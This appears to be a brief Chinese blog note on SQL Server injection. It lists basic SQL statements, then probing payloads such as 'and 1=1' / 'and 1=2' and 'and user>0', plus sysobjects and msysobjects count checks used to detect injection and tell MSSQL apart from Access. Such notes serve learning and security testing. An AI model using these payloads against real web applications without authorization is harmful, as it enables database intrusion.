无题
笔记
SqlServer注入
常用语句
•说明:创建数据库
•CREATE DATABASE database-name
•2、说明:删除数据库
•drop database dbname
•查询所有:
•Select * from 表名
•select * from Student
判断语句
1.判断是否有注入
and 1=1
and 1=2
•/
•-0
•判断注入的方法是一样的
•2.初步判断是否是mssql
•and user>0
•3.判断数据库系统
•and (select count(*) from sysobjects)>0 mssql
•and (select count(*) from msysobjects)>0 access
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 北极找北!
